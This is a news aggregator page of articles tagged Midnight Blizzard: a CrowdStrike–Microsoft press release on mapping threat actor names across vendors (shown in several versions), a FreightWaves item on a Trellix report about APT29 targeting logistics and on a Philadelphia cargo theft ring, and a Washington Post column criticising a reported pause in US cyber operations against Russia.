Latest news with #MidnightBlizzard
Yahoo
4 days ago
- Business
- Yahoo
CrowdStrike and Microsoft Collaborate to Harmonize Cyber Threat Attribution
Landmark industry collaboration maps threat actor aliases across vendors to accelerate response and strengthen global cyberdefense AUSTIN, Texas, June 02, 2025--(BUSINESS WIRE)--CrowdStrike (NASDAQ: CRWD) and Microsoft today announced a collaboration to bring clarity and coordination to how cyber threat actors are identified and tracked across security vendors. By mapping threat actor aliases and aligning adversary attribution across platforms, the collaboration minimizes confusion caused by different naming systems and accelerates cyber defenders' response against today's and tomorrow's most sophisticated adversaries. The cybersecurity industry has developed multiple naming systems for threat actors, each grounded in unique vantage points, intelligence sources, and analytic rigor. These taxonomies provide critical adversary context to help organizations understand the threats they face, who is targeting them, and why. But as the adversary landscape grows, so does the complexity of cross-vendor attribution. Through this deeper collaboration, CrowdStrike and Microsoft have developed a shared mapping system – a 'Rosetta Stone' for cyber threat intelligence – that links adversary identifiers across vendor ecosystems without mandating a single naming standard. By reducing ambiguity in how adversaries are labeled, this mapping enables defenders to make faster, more confident decisions, correlate threat intelligence across sources, and better disrupt threat actor activity before it causes harm. By making it easier to connect naming conventions like COZY BEAR and Midnight Blizzard, the mapping supports quicker decision-making and unified threat response across taxonomies. "This is a watershed moment for cybersecurity. Adversaries hide behind both technology and the confusion created by inconsistent naming. As defenders, it's our job to stay ahead and to give security teams clarity on who is targeting them and how to respond. This has been CrowdStrike's mission from day one," said Adam Meyers, Head of Counter Adversary Operations at CrowdStrike. "CrowdStrike is the leader in adversary intelligence, and Microsoft brings one of the most valuable data sources on adversary behavior. Together, we're combining strengths to deliver clarity, speed, and confidence to defenders everywhere." The collaboration will start with a shared analyst-led effort to harmonize adversary naming between CrowdStrike and Microsoft's threat research teams. Through this collaboration, the companies have already deconflicted more than 80 adversaries, including validating threat actors like Microsoft's Volt Typhoon and CrowdStrike's VANGUARD PANDA are Chinese state-sponsored threat actors, and that Secret Blizzard and VENOMOUS BEAR refer to the same Russia-nexus adversary. This demonstrates the real-world value of shared attribution. Moving forward, CrowdStrike and Microsoft will continue working together to expand this effort, inviting other partners to contribute to and maintain a shared threat actor mapping resource for the global cybersecurity community. "Cybersecurity is a defining challenge of our time, especially in today's AI-driven era," said Vasu Jakkal, Corporate Vice President, Microsoft Security. "Microsoft and CrowdStrike are in ideal positions to help our customers, and the wider defender community accelerate the benefits of actionable threat intelligence. Security is a team sport and when defenders can share and react to information faster it makes a difference in how we protect the world." This collaboration builds on each company's deep history of threat intelligence leadership and advances a shared mission: delivering better outcomes for defenders by putting customers first and the mission before the market. To learn more about the CrowdStrike and Microsoft collaboration on cyber threat attribution, please visit our blog. About CrowdStrike CrowdStrike (NASDAQ: CRWD), a global cybersecurity leader, has redefined modern security with the world's most advanced cloud-native platform for protecting critical areas of enterprise risk – endpoints and cloud workloads, identity and data. Powered by the CrowdStrike Security Cloud and world-class AI, the CrowdStrike Falcon® platform leverages real-time indicators of attack, threat intelligence, evolving adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-accurate detections, automated protection and remediation, elite threat hunting and prioritized observability of vulnerabilities. Purpose-built in the cloud with a single lightweight-agent architecture, the Falcon platform delivers rapid and scalable deployment, superior protection and performance, reduced complexity and immediate time-to-value. CrowdStrike: We stop breaches. Learn more: Follow us: Blog | X | LinkedIn | Facebook | Instagram Start a free trial today: © 2025 CrowdStrike, Inc. All rights reserved. CrowdStrike and CrowdStrike Falcon are marks owned by CrowdStrike, Inc. and are registered in the United States and other countries. CrowdStrike owns other trademarks and service marks and may use the brands of third parties to identify their products and services. View source version on Contacts Media Contacts: Jake SchusterCrowdStrike Corporate Communicationspress@ Error in retrieving data Sign in to access your portfolio Error in retrieving data Error in retrieving data Error in retrieving data Error in retrieving data
Techday NZ
4 days ago
- Techday NZ
CrowdStrike & Microsoft unify naming for cyber threat actors
CrowdStrike and Microsoft have jointly introduced a new initiative aimed at standardising the way cyber threat actors are identified across the cybersecurity sector. The collaboration has resulted in a shared mapping system, aligning threat actor aliases between the two companies and promoting clarity in cyber threat attribution. Both companies state that this initiative is designed to accelerate threat response and reduce confusion caused by the inconsistent nicknames used for hacker groups among different security vendors. The cybersecurity industry has historically relied on disparate naming systems, each informed by distinct intelligence sources and analytical approaches. While these systems provide valuable context on adversaries, they can complicate cross-reference and response due to conflicting terminology. This increased complexity has prompted the need for a unified approach to threat actor attribution. CrowdStrike and Microsoft's joint mapping project serves as a form of 'Rosetta Stone' for cyber threat intelligence, linking adversary identifiers across their respective ecosystems without imposing a single nomenclature. By connecting aliases—such as CrowdStrike's COZY BEAR and Microsoft's Midnight Blizzard, or VANGUARD PANDA and Volt Typhoon—the mapping facilitates quicker and better-coordinated responses to sophisticated adversaries. According to CrowdStrike, the partners have already reconciled over 80 threat group aliases. The alignment expands to groups linked to major nation-state actors. For example, the companies have confirmed that Microsoft's Volt Typhoon and CrowdStrike's VANGUARD PANDA refer to the same China-nexus actor, while Secret Blizzard and VENOMOUS BEAR designate a Russia-linked group. Adam Meyers, Head of Counter Adversary Operations at CrowdStrike, commented on the significance of the collaboration. "This is a watershed moment for cybersecurity. Adversaries hide behind both technology and the confusion created by inconsistent naming. As defenders, it's our job to stay ahead and to give security teams clarity on who is targeting them and how to respond. This has been CrowdStrike's mission from day one," Meyers said. "CrowdStrike is the leader in adversary intelligence, and Microsoft brings one of the most valuable data sources on adversary behavior. Together, we're combining strengths to deliver clarity, speed, and confidence to defenders everywhere." The initial phase of the collaboration involves specialist teams from both companies working together to harmonise adversary naming conventions. The effort has already demonstrated practical value by validating the identities of specific threat actors across the two ecosystems. The companies will seek to expand this initiative, inviting additional contributors to create and maintain a broader threat actor mapping resource accessible to the global cybersecurity community. Vasu Jakkal, Corporate Vice President for Microsoft Security, emphasised the broader implications for the security sector. "Cybersecurity is a defining challenge of our time, especially in today's AI-driven era," Jakkal said. "Microsoft and CrowdStrike are in ideal positions to help our customers, and the wider defender community accelerate the benefits of actionable threat intelligence. Security is a team sport and when defenders can share and react to information faster it makes a difference in how we protect the world." The companies note that their collaboration builds on an established history of threat intelligence activity and contributes towards a shared mission: prioritising customer outcomes and sector-wide defence, rather than market competition. The mapping initiative will continue to develop as more partners join to keep the threat actor taxonomy up to date and useful for the defender community. Follow us on: Share on:
Business Wire
4 days ago
- Business
- Business Wire
CrowdStrike and Microsoft Collaborate to Harmonize Cyber Threat Attribution
AUSTIN, Texas--(BUSINESS WIRE)-- CrowdStrike (NASDAQ: CRWD) and Microsoft today announced a collaboration to bring clarity and coordination to how cyber threat actors are identified and tracked across security vendors. By mapping threat actor aliases and aligning adversary attribution across platforms, the collaboration minimizes confusion caused by different naming systems and accelerates cyber defenders' response against today's and tomorrow's most sophisticated adversaries. The cybersecurity industry has developed multiple naming systems for threat actors, each grounded in unique vantage points, intelligence sources, and analytic rigor. These taxonomies provide critical adversary context to help organizations understand the threats they face, who is targeting them, and why. But as the adversary landscape grows, so does the complexity of cross-vendor attribution. Through this deeper collaboration, CrowdStrike and Microsoft have developed a shared mapping system – a 'Rosetta Stone' for cyber threat intelligence – that links adversary identifiers across vendor ecosystems without mandating a single naming standard. By reducing ambiguity in how adversaries are labeled, this mapping enables defenders to make faster, more confident decisions, correlate threat intelligence across sources, and better disrupt threat actor activity before it causes harm. By making it easier to connect naming conventions like COZY BEAR and Midnight Blizzard, the mapping supports quicker decision-making and unified threat response across taxonomies. 'This is a watershed moment for cybersecurity. Adversaries hide behind both technology and the confusion created by inconsistent naming. As defenders, it's our job to stay ahead and to give security teams clarity on who is targeting them and how to respond. This has been CrowdStrike's mission from day one,' said Adam Meyers, Head of Counter Adversary Operations at CrowdStrike. 'CrowdStrike is the leader in adversary intelligence, and Microsoft brings one of the most valuable data sources on adversary behavior. Together, we're combining strengths to deliver clarity, speed, and confidence to defenders everywhere.' The collaboration will start with a shared analyst-led effort to harmonize adversary naming between CrowdStrike and Microsoft's threat research teams. Through this collaboration, the companies have already deconflicted more than 80 adversaries, including validating threat actors like Microsoft's Volt Typhoon and CrowdStrike's VANGUARD PANDA are Chinese state-sponsored threat actors, and that Secret Blizzard and VENOMOUS BEAR refer to the same Russia-nexus adversary. This demonstrates the real-world value of shared attribution. Moving forward, CrowdStrike and Microsoft will continue working together to expand this effort, inviting other partners to contribute to and maintain a shared threat actor mapping resource for the global cybersecurity community. 'Cybersecurity is a defining challenge of our time, especially in today's AI-driven era,' said Vasu Jakkal, Corporate Vice President, Microsoft Security. 'Microsoft and CrowdStrike are in ideal positions to help our customers, and the wider defender community accelerate the benefits of actionable threat intelligence. Security is a team sport and when defenders can share and react to information faster it makes a difference in how we protect the world.' This collaboration builds on each company's deep history of threat intelligence leadership and advances a shared mission: delivering better outcomes for defenders by putting customers first and the mission before the market. To learn more about the CrowdStrike and Microsoft collaboration on cyber threat attribution, please visit our blog. About CrowdStrike CrowdStrike (NASDAQ: CRWD), a global cybersecurity leader, has redefined modern security with the world's most advanced cloud-native platform for protecting critical areas of enterprise risk – endpoints and cloud workloads, identity and data. Powered by the CrowdStrike Security Cloud and world-class AI, the CrowdStrike Falcon® platform leverages real-time indicators of attack, threat intelligence, evolving adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-accurate detections, automated protection and remediation, elite threat hunting and prioritized observability of vulnerabilities. Purpose-built in the cloud with a single lightweight-agent architecture, the Falcon platform delivers rapid and scalable deployment, superior protection and performance, reduced complexity and immediate time-to-value. CrowdStrike: We stop breaches. © 2025 CrowdStrike, Inc. All rights reserved. CrowdStrike and CrowdStrike Falcon are marks owned by CrowdStrike, Inc. and are registered in the United States and other countries. CrowdStrike owns other trademarks and service marks and may use the brands of third parties to identify their products and services.
Yahoo
09-05-2025
- Business
- Yahoo
Cyberthreats surge against US logistics infrastructure
Cybersecurity provider Trellix recently released its April 'CyberThreat Report' revealing an alarming rise in cyberattacks targeting critical U.S. infrastructure, with the freight and logistics sectors now in the crosshairs of nation-state actors and sophisticated ransomware groups. Between October 2024 and March 2025, the U.S. saw a 136% increase in Advanced Persistent Threat (APT) activity, prolonged and targeted cyberattacks in which an intruder gains unauthorized access to a network and remains undetected for an extended period. Of particular concern is the role of APT29, also known as Midnight Blizzard, a well-documented cyber espionage group linked to the Russian Foreign Intelligence Service. Known for its stealthy, high-level campaigns, APT29 specializes in long-term intrusions that exfiltrate sensitive data without immediate detection. Trellix researchers report that 55% of APT29's observed activity in this period specifically targeted the transportation and shipping sectors, signaling a coordinated focus on disrupting or surveilling supply chain operations. For logistics professionals, this suggests that state-sponsored actors are probing for weaknesses not just in physical infrastructure, but also in the digital ecosystems that support freight visibility, scheduling and warehouse management. Meanwhile, ransomware continues to plague U.S. organizations, with 58% of all global ransomware-related posts traced back to U.S.-based attacks. This reflects an environment where financially motivated criminal groups are increasingly exploiting known and zero-day vulnerabilities, bypassing phishing emails in favor of more direct and technical exploits. What's more troubling is the evolution in attacker methods. Rather than relying on suspicious email attachments, cybercriminals are now favoring fileless malware, which hides in memory, and using legitimate Windows tools to execute attacks, making them harder to detect with traditional antivirus solutions. Learn more about these cybersecurity threats in the Trellix report. How did Flexport's Convoy platform achieve zero thefts over the past 380,000 loads booked? Dooner asked the guy who runs it on a recent episode of WHAT THE TRUCK?!? Here's what Bill Driegert, head of trucking, had to say: Lt. George Ackerman of the Philadelphia Police Department was no stranger to crime trends, but when tractor trailers filled with beef, booze, crab legs and TVs began disappearing at an alarming rate in 2022, even his decades of experience couldn't explain the scale. What began as sporadic cargo thefts ballooned into a citywide epidemic, particularly across Philly's 8th District, where over 180 thefts were eventually reported. The goods, often worth millions, vanished without a trace, with no suspects, no patterns and no product ever recovered. Ackerman, a former trucker himself, became the lead on what would become the city's largest cargo theft case in modern history. At first, detectives assumed it was a string of isolated jobs. But the thieves always seemed to know exactly where to strike, regardless of drivers' unique schedules. A breakthrough came in April 2023, when Ackerman responded to a robbery involving over 2 million U.S. dimes stolen from a U.S. Mint trailer. Surveillance footage showed a highly coordinated team, including scouts, lookouts and loaders, operating in sync. Ackerman and his team, with support from the FBI, Secret Service and state police, slowly began to unravel the group. Cell tower data, surveillance footage and even Coinstar deposits pointed to a tightly knit crew based in the area. Their incriminating texts, bragging about 'liquor and cow feet' dinners, confirmed their role in more than $1.5 million in thefts. Learn more about Ackerman's detective work from Philadelphia magazine here. Be part of the solution that stops freight fraud in its tracks. Let's cut through the noise and address this issue head-on! Freight fraud has reached a crisis level, and it impacts everyone in the industry. It's time for us to come together to address this critical problem and share best practices on how to mitigate it. Join us on May 14 in Dallas at the Freight Fraud Symposium, where transportation executives, freight leaders and technology buyers will come together to discuss the issues we all face, share lessons learned and get insights on the latest technology to tackle this problem. Register now Articles by Grace Sharkey Fraud flowers in April showers Massachusetts man convicted in CDL bribery scam DHL Express ships endangered antelopes to Kenya; freight fraud; fixing backhauls | WHAT THE TRUCK?!? The post Cyberthreats surge against US logistics infrastructure appeared first on FreightWaves.
Washington Post
05-03-2025
- Politics
- Washington Post
The White House's risky cyberoffense stand-down
'Stand down' is an order that military leaders fear. But that's what Defense Secretary Pete Hegseth reportedly ordered U.S. Cyber Command to do in its operations and planning against Russia, as part of President Donald Trump's efforts to cajole the Kremlin into making a peace deal with Ukraine. The order to pause offensive cyberoperations, first reported Friday by the Record, may be the most dramatic example of Trump's eagerness to woo Russian President Vladimir Putin. And it raised alarm among a half-dozen former senior national security officials I talked with Monday. The Pentagon hasn't responded to the story except to say that it does not 'discuss cyber intelligence, plans, or operations.' The stand-down order isn't dangerous in itself, officials tell me. This is the kind of sweetener that often accompanies diplomatic efforts. When the United States wants to foster negotiations, it will cancel military exercises or halt provocative overflights — or occasionally, as in the case of Trump's summitry with North Korea in 2018 and 2019, suspend offensive cyberoperations. But beware: Cyberoperations may be the most valuable weapons in today's national security arsenal. They're the essential tool in collecting intelligence, and they can cripple an adversary's military operations and economic stability. Once a president begins making concessions in this area, he risks giving up U.S. power in a domain where, for all Russia's and China's efforts, the United States remains dominant. Understanding what's at stake in the cyber realm is hard, because the activities of Cyber Command and its civilian partner, the National Security Agency, are so secret. But the basics were outlined in a 2020 article in Foreign Affairs by Gen. Paul Nakasone, then head of Cyber Command and the NSA, and Michael Sulmeyer, his senior adviser. They explained that in cyberspace, the United States maintains 'persistent engagement' — meaning that conflict with adversaries isn't an on-off switch, but more like a rheostat you can dial up or down. And it's normally at about three, officials tell me. We're always at a low level of cyberwar with Russia and China, in other words. The NSA and Cyber Command are constantly inside Russian servers — gathering intelligence, monitoring threats and planting tools for future use. 'We stay engaged. We stay in the network. We see what malware they're developing,' said one former senior official. And sometimes, as in responding to last year's Russian sabotage campaign against NATO supporters of Ukraine, the United States has probably taken offensive action to disrupt threats. Russia and China, meanwhile, are constantly attacking the United States, often to devastating effect. If you doubt it, take a look at Microsoft's regular reports on the Russian intelligence operation it calls 'Midnight Blizzard,' which over the past two years hacked into hundreds of sensitive organizations. Or read up on the Chinese 'Salt Typhoon' and 'Volt Typhoon' attacks that have burrowed into our telecommunications companies and critical infrastructure. The cyber experts I consulted don't know for sure what Hegseth's order means in practice. It appears to apply only to Cyber Command's offensive hacking — and not to the NSA's intelligence gathering. But the two are intertwined. The NSA will penetrate a Russian network to collect information and, in the process, detect a threat or vulnerability and share that information with Cyber Command. Sometimes, the dual-hatted commander of the two organizations must decide whether to preserve the intel source or take it down. The fear is that limits on Cyber Command may bleed into NSA operations. Then there's the question of how long this operational pause will last. Experts fear that if it lasts more than a month, Cyber Command will start losing essential threads. It's hard to recover access points and signatures. And there's lost human contact, too. The Cyber Command doctrine is to 'hunt forward' — meaning to send cyberwarriors to friendly countries where Russian networks may be easier to access. Those ties could wither, too. Finally, cyber experts worry that Trump, in his deepening embrace of Putin, may contemplate a bigger deal that would amount to disarmament in cyberspace. That's a dangerous mistake for two reasons, experts say: The United States is ahead in cyber and would lose this advantage, and any deal in this domain would be unverifiable. The easiest way to illustrate the perils of Trump's tilt toward Russia is to recall a similar experience, the U.S.-Russia 'reset' attempted by President Barack Obama when Dmitry Medvedev was Russia's president. For a trip down bad-memory lane, take a look at the Obama team's 11-page summary in 2010 of its reset agenda, whose initiatives all crashed and burned when Putin regained the presidency in 2012. Trump probably wouldn't like to think he's emulating Obama, but that's a fact. The Kremlin is crowing that Trump's version of a Moscow-friendly peace deal on Ukraine 'largely aligns with our vision.' That should frighten anyone who has studied Putin's attempts to redraw the security map in Europe. In 1987, in his book 'The Art of the Deal,' Trump had it right: 'The worst thing you can possibly do in a deal is seem desperate to make it. That makes the other guy smell blood, and then you're dead.' He should follow his own advice — especially when it comes to lowering our cyberdefenses.
